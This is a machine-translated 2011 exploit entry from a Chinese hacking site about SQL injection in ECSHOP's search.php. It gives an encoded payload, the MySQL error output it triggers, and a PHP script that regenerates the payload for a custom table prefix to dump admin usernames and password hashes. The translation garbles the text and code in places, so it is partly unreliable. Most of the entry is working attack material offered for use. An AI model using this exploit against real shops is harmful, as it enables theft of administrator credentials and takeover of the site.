ECSHOP search variant of the storm user password error solutions-vulnerability warning-the black bar safety net

2011-05-09T00:00:00
ID MYHACK58:62201130387
Type myhack58
Reporter 佚名
Modified 2011-05-09T00:00:00

Description

Experience one ECSHOP take advantage of online EXP

| search. php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319

Returns: MySQL server error report:Array ( [0] => Array ( [message] = > MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM ma526073ww.73ww_goods_attr WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num= '1' ) [2] => Array ( [error] => Table 'ma526073ww. ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1 1 4 6 ) )

The reason is the database prefix modify the problem.

Solution: re-generate EXP variant file.

With the following code to generate a code:

<? php $p="ecs_"; $p=isset($_REQUEST['pre'])?$ _REQUEST['pre']:$p; $arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$ p."admin_user#"=>"1"); $exp = array("attr"=>$arr); $exp = base64_encode(serialize($exp)); //echo $exp; ?& gt; <textarea name="textarea" id="textarea" cols="1 0 0" rows="5"><?=$ exp?& gt;</textarea>


以上 代码 保存 为 x.php,

73ww_ for the table prefix.

By<http://www.xxx.com/?per=73ww>_access, to generate new BASE64 encrypted file.

!